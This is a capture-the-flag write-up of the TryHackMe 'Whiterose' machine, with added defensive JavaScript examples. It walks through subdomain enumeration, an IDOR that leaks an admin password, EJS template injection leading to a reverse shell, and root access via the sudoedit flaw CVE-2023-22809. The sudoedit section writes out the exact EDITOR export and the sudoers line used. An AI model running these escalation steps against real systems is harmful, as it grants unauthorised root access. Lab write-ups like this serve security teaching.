Whiterose Writeup (TryHackMe Easy Machine)

 

This challenge is based on the Mr. Robot episode “409 Conflict”. And oh! I almost forgot! — You will need these: Olivia Cortez:olivi8. Can you take down the Deus group?


Overview

Whiterose is an easy machine from TryHackMe. It relies heavily on enumeration and on creative problem-solving. We start by discovering an unrestricted admin subdomain of the Cyprus Bank that lists all transactions and customer accounts.

There we find an admin chatroom with a poorly implemented chat-history feature, which lets us read past chat logs and exposes another admin’s password: an example of an IDOR.

Once we have access to the Settings tab, we discover another serious vulnerability, SSTI (Server-Side Template Injection) in the EJS (Embedded JavaScript) template engine, which gives us a reverse shell from the machine.

Lastly, we abuse a sudo rule for the “sudoedit” binary, which exists to edit files safely with root privileges. Combined with a legacy sudo version, this lets us write unrestricted privileges for our user into “/etc/sudoers” through a crafted “EDITOR” environment variable.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.30.56 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-01 13:13 EST
Nmap scan report for 10.10.30.56
Host is up (0.069s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
| 256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_ 256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.0 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 63.91 ms 10.9.0.1
2 63.99 ms 10.10.30.56

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds

The Nmap scan showed two open ports: 22 for SSH and 80 for an HTTP server running Nginx 1.14.0.


Web Enumeration

Looking at the web server, we first need to add “cyprusbank.thm” to the “/etc/hosts” file.

After that, we have access to the website.


Using FFuF for subdomain enumeration, we find an “admin” subdomain with a login panel. Don’t forget to add it to the “/etc/hosts” file as well.

┌──(kali㉿kali)-[~]
└─$ ffuf -u "http://cyprusbank.thm" -w /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt -H "HOST: FUZZ.cyprusbank.thm" -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://cyprusbank.thm
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.cyprusbank.thm
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

www [Status: 200, Size: 252, Words: 19, Lines: 9, Duration: 163ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 265ms]
:: Progress: [19966/19966] :: Job [1/1] :: 851 req/sec :: Duration: [0:00:30] :: Errors: 0 ::


We can log in with the credentials from the machine description, “Olivia Cortez:olivi8”. Inside we see a table of recent payments and accounts, as well as an admin chat that reveals potential admin accounts. We don’t have permission to access the Settings tab.

admin chatroom


IDOR, getting other admin’s password & discovering Tyrell Wellick’s phone number

After playing with the chatroom and trying some HTML injection, I noticed a “c” parameter in the URL. Changing it to a higher number makes older chat logs appear in the chatroom: the “c” parameter directly controls how much of the chat history is shown, and the older messages contain the admins discussing the implementation of that history feature. This is an example of IDOR (Insecure Direct Object Reference), disclosing information our user is not supposed to see (presumably; it may just be a poorly implemented feature). From the newly revealed chat logs we get the password of the other admin, “Gayle Bev”.
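To make the IDOR concrete from the defender’s side, here is an added example (my own code, not the Cyprus Bank application’s) that models the chat-history endpoint in plain JavaScript: a handler that trusts the “c” parameter the way the writeup describes, next to a hardened one where how much history a user sees is decided by their session’s permissions and capped server-side. The message store, the session objects and the `canViewHistory` permission flag are constructed for the example.

```javascript
// Added example, not the application's code. Constructed chat store: the two
// oldest messages belong to the history feature that only some admins may see.
const MESSAGES = [
  { id: 1, author: "Gayle Bev", text: "testing the chat history feature", restricted: true },
  { id: 2, author: "Gayle Bev", text: "<sensitive content, constructed placeholder>", restricted: true },
  { id: 3, author: "Olivia Cortez", text: "hello team", restricted: false },
  { id: 4, author: "Gayle Bev", text: "hi Olivia", restricted: false },
  { id: 5, author: "Olivia Cortez", text: "any news?", restricted: false },
];

// Constructed sessions; `canViewHistory` is a hypothetical permission flag.
const SESSIONS = {
  olivia: { user: "Olivia Cortez", canViewHistory: false },
  gayle: { user: "Gayle Bev", canViewHistory: true },
};

const DEFAULT_COUNT = 3;
const MAX_COUNT = 50;

// Vulnerable shape: the client-supplied `c` alone decides how far back the
// history goes, so raising it returns older messages to anyone who is logged in.
function chatHistoryVulnerable(session, query, store = MESSAGES) {
  const c = parseInt(query.c, 10) || DEFAULT_COUNT;
  return store.slice(-c);
}

// Hardened shape: `c` is validated and bounded, and every message passes an
// authorization check bound to the session, so the parameter can only select
// among messages the user is already allowed to read.
function chatHistoryHardened(session, query, store = MESSAGES) {
  let c = parseInt(query.c, 10);
  if (!Number.isInteger(c) || c < 1) c = DEFAULT_COUNT;
  c = Math.min(c, MAX_COUNT);
  const visible = store.filter((m) => !m.restricted || session.canViewHistory);
  return visible.slice(-c);
}

// Express wiring would look like this (not run here):
//   app.get("/chat", (req, res) =>
//     res.render("chat", { messages: chatHistoryHardened(req.session, req.query) }));

// Check helper: does a response contain any restricted message?
function leaksRestricted(messages) {
  return messages.some((m) => m.restricted);
}

// Quick demonstration with the constructed data.
console.log("vulnerable, olivia, c=100:", chatHistoryVulnerable(SESSIONS.olivia, { c: "100" }).map((m) => m.id));
console.log("hardened,   olivia, c=100:", chatHistoryHardened(SESSIONS.olivia, { c: "100" }).map((m) => m.id));
console.log("hardened,   gayle,  c=100:", chatHistoryHardened(SESSIONS.gayle, { c: "100" }).map((m) => m.id));
```

The point of the hardened version is that the parameter never becomes the authorization decision: it only chooses how many of the already-permitted messages to show.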


After logging in as “Gayle Bev”, we get access to the Settings tab and to more information about the customers, including the telephone number of Tyrell Wellick, which is one of our tasks.


SSTI, getting a foothold & user flag

I booted up good old Burp Suite and tested the Settings tab for numerous vulnerabilities, like HTML injection, XSS and command injection, with no luck. But when I removed the “password” parameter from the request, the server returned a 500 Internal Server Error with an interesting error message.

The error message revealed that EJS (Embedded JavaScript) is running in the back end. With the browser plugin Wappalyzer, we can also see that the Express.js framework is in use, a back-end web application framework for building RESTful APIs with Node.js.


This opened the door to a new attack vector: SSTI (Server-Side Template Injection). After some research I found this article explaining RCE via EJS SSTI: https://eslam.io/posts/ejs-server-side-template-injection-rce/. I took the payload from the article, adjusted it a bit and got an initial foothold as “web”.

I had to use BusyBox with Netcat. BusyBox is a software suite that provides several Unix utilities in a single executable file. In embedded systems or minimal environments you may not have access to the full version of Netcat or other networking tools, and BusyBox provides a lightweight alternative that can perform similar functions. (explained by Blackbox.ai)
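On the defensive side, the two weaknesses this section turns on (a 500 page that names the template engine, and request data reaching the EJS render call) are both fixable in the handler. The following is an added example in plain JavaScript, not the application’s code: an allow-listed builder for the values handed to the template, and an error response that stays generic in production. EJS picks several of its own options up from the locals object that Express passes to `res.render`, which is why forwarding `req.body` wholesale is the dangerous pattern. The field names, the `renderFn` stub standing in for `res.render`, and the `isProduction` switch are assumptions.

```javascript
// Added example, not the application's code.

// Only these body fields may reach the template, and only as strings. Any
// other key (nested objects included) is dropped before rendering, so the
// request body can never carry EJS options such as `settings` into the view.
const ALLOWED_SETTINGS_FIELDS = ["name", "password"]; // constructed allow-list

function buildRenderLocals(body) {
  const locals = {};
  if (!body || typeof body !== "object") return locals;
  for (const key of ALLOWED_SETTINGS_FIELDS) {
    if (typeof body[key] === "string") locals[key] = body[key];
  }
  return locals;
}

// Generic 500 in production; the detailed message is only for development.
// The writeup's foothold began with a 500 page that revealed the engine.
function errorResponse(err, isProduction = true) {
  if (isProduction) return { status: 500, body: "Internal Server Error" };
  return { status: 500, body: `${err.name}: ${err.message}` };
}

// Settings handler modelled as a pure function: `renderFn(view, locals)` stands
// in for Express's res.render so the example runs without a web server.
function settingsHandler(body, renderFn, isProduction = true) {
  try {
    const locals = buildRenderLocals(body);
    if (locals.password === undefined) throw new Error("password is required");
    return { status: 200, body: renderFn("settings", locals) };
  } catch (err) {
    return errorResponse(err, isProduction);
  }
}

// Express wiring (not run here):
//   app.post("/settings", (req, res, next) => {
//     const locals = buildRenderLocals(req.body);
//     if (locals.password === undefined) return next(new Error("password is required"));
//     res.render("settings", locals);
//   });
//   plus a last-mounted error middleware that sends
//   errorResponse(err, app.get("env") === "production").

// Demonstration: a body that smuggles a `settings` key is reduced to the
// allow-listed fields, and a missing password yields only a generic 500.
const demoRender = (view, locals) => `${view}:${Object.keys(locals).sort().join(",")}`;
console.log(buildRenderLocals({ name: "Gayle", password: "x", settings: { "view options": {} } }));
console.log(settingsHandler({ name: "Gayle" }, demoRender));
```

Keeping the template inputs to a fixed set of scalar fields is what closes the injection path; the generic error page is what would have kept the engine name out of the attacker’s hands in the first place.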

In our user’s home directory, there was the user flag waiting for us.


Privilege Escalation via “sudoedit” & root flag

Starting with “sudo -l”, we see that we can run “sudoedit” as root without a password. “Sudoedit” is a command that allows users to edit files with root privileges while maintaining the integrity of the original file.

web@cyprusbank:~$ sudo -l
Matching Defaults entries for web on cyprusbank:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User web may run the following commands on cyprusbank:
(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm


Doing some research, I found this CVE affecting “sudoedit”: https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf. The PDF states that the vulnerable sudo versions are 1.8.0 to 1.9.12p1. Checking our sudo version, it matched perfectly.

web@cyprusbank:~$ sudo --version
Sudo version 1.9.12p1
Sudoers policy plugin version 1.9.12p1
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.12p1
Sudoers audit plugin version 1.9.12p1


I followed the steps shown in another article: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudoedit-privilege-escalation/.

First I exported a new “EDITOR” variable with the content “vim -- /etc/sudoers”. When I then ran “sudoedit” on the permitted file, it also opened “/etc/sudoers” in Vim, where I could add the line “web ALL=(ALL:ALL) NOPASSWD: ALL”, giving my user unrestricted access to the machine.

web@cyprusbank:~/app$ export EDITOR="vim -- /etc/sudoers"
web@cyprusbank:~/app$ sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
sudoedit: --: editing files in a writable directory is not permitted
2 files to edit
sudoedit: /etc/nginx/sites-available/admin.cyprusbank.thm unchanged
web@cyprusbank:~/app$ sudo su root
root@cyprusbank:/home/web/app# whoami
root
root@cyprusbank:/home/web/app# pwd
/home/web/app
root@cyprusbank:/home/web/app# cd /root
root@cyprusbank:~# ls -la
total 40
drwx------ 6 root root 4096 Apr 4 2024 .
drwxr-xr-x 23 root root 4096 Jul 12 2023 ..
lrwxrwxrwx 1 root root 9 Jul 16 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Jul 16 2023 .cache
-rwxr-xr-x 1 root root 156 Apr 4 2024 clean.sh
drwx------ 3 root root 4096 Jul 16 2023 .gnupg
drwxr-xr-x 3 root root 4096 Jul 16 2023 .local
drwxr-xr-x 5 root root 4096 Apr 4 2024 .pm2
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 21 Jul 15 2023 root.txt

With the command “sudo su root” I became superuser. Nothing was stopping me from getting the root flag now.
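As a closing note from the defender’s side, this added example (my own code, not from the writeup or the sudo project) is a small Node.js audit helper: it parses `sudo --version` output and flags a build inside the 1.8.0 to 1.9.12p1 range the Synacktiv paper gives for CVE-2023-22809, lists the sudoers rules that grant `sudoedit`, and checks whether the sudoers text contains the `env_delete` workaround the sudo project published for installs that cannot upgrade (`Cmnd_Alias SUDOEDIT = sudoedit` followed by `Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"`; I am quoting those lines from the sudo advisory, not from this page). The version text and sudoers sample used in the default run are constructed to mirror this machine; the live run against the real system is opt-in through the `SUDOEDIT_AUDIT` environment variable and needs root to read `/etc/sudoers`.

```javascript
// Added example, not part of the writeup. Node.js audit helper for the
// sudoedit issue; all sample inputs below are constructed.

// `sudo --version` starts with a line like "Sudo version 1.9.12p1".
function parseSudoVersion(text) {
  const m = /Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?/.exec(text);
  if (!m) return null;
  return { major: +m[1], minor: +m[2], patch: +m[3], plevel: m[4] ? +m[4] : 0 };
}

// Order versions by a single integer key so range checks are plain compares.
function versionKey(v) {
  return ((v.major * 1000 + v.minor) * 1000 + v.patch) * 1000 + v.plevel;
}

// Affected range as stated in the Synacktiv paper: 1.8.0 up to 1.9.12p1.
const AFFECTED_LOW = versionKey({ major: 1, minor: 8, patch: 0, plevel: 0 });
const AFFECTED_HIGH = versionKey({ major: 1, minor: 9, patch: 12, plevel: 1 });

// true = inside the affected range, false = outside, null = unparsable input.
function isAffectedSudoVersion(versionText) {
  const v = parseSudoVersion(versionText);
  if (!v) return null;
  const k = versionKey(v);
  return k >= AFFECTED_LOW && k <= AFFECTED_HIGH;
}

// User-specification lines that grant sudoedit directly. Grants routed through
// a Cmnd_Alias are not resolved here, so treat the list as a starting point.
function findSudoeditRules(sudoersText) {
  return sudoersText
    .split("\n")
    .map((l) => l.trim())
    .filter((l) => l && !l.startsWith("#") && !l.startsWith("Defaults") && !l.startsWith("Cmnd_Alias"))
    .filter((l) => /\bsudoedit\b/.test(l));
}

// Workaround the sudo project documented for versions that cannot be upgraded
// (quoted from the advisory, not from this page):
//   Cmnd_Alias SUDOEDIT = sudoedit
//   Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"
function hasSudoeditEnvWorkaround(sudoersText) {
  const re = /^\s*Defaults!SUDOEDIT\s+env_delete\+?=\s*"?[^"\n]*\bEDITOR\b/m;
  return re.test(sudoersText);
}

// One verdict an operator can act on: affected build, a sudoedit grant, and
// no workaround in place.
function auditSudoedit(versionText, sudoersText) {
  const affected = isAffectedSudoVersion(versionText);
  const rules = findSudoeditRules(sudoersText);
  const workaround = hasSudoeditEnvWorkaround(sudoersText);
  const atRisk = affected === true && rules.length > 0 && !workaround;
  return { affected, rules, workaround, atRisk };
}

// Constructed samples mirroring the writeup's `sudo --version` and `sudo -l`.
const SAMPLE_VERSION = "Sudo version 1.9.12p1\nSudoers policy plugin version 1.9.12p1\n";
const SAMPLE_SUDOERS = [
  "Defaults env_reset",
  "Defaults mail_badpass",
  "root ALL=(ALL:ALL) ALL",
  "web ALL=(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm",
].join("\n");

// Opt-in live run: SUDOEDIT_AUDIT=1 node audit.js (reading /etc/sudoers needs root).
if (process.env.SUDOEDIT_AUDIT === "1") {
  const { execSync } = require("child_process");
  const fs = require("fs");
  const ver = execSync("sudo --version", { encoding: "utf8" });
  const sudoers = fs.readFileSync("/etc/sudoers", "utf8");
  console.log(JSON.stringify(auditSudoedit(ver, sudoers), null, 2));
} else {
  console.log(JSON.stringify(auditSudoedit(SAMPLE_VERSION, SAMPLE_SUDOERS), null, 2));
}
```

On this box the helper would report `atRisk: true`: an affected version, a sudoedit grant for `web`, and no environment-stripping default. Upgrading sudo is the real fix; the `env_delete` default is the stopgap for hosts that cannot be patched yet.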


Summary

Whiterose is an easy, straightforward machine. I really liked all the references to the show Mr. Robot. It makes you practice your web enumeration skills and showcases the danger of poorly implemented web features, here an IDOR and SSTI in the EJS templating language. Finally, it shows how elevated privileges on certain binaries can be abused when combined with vulnerable legacy sudo versions.
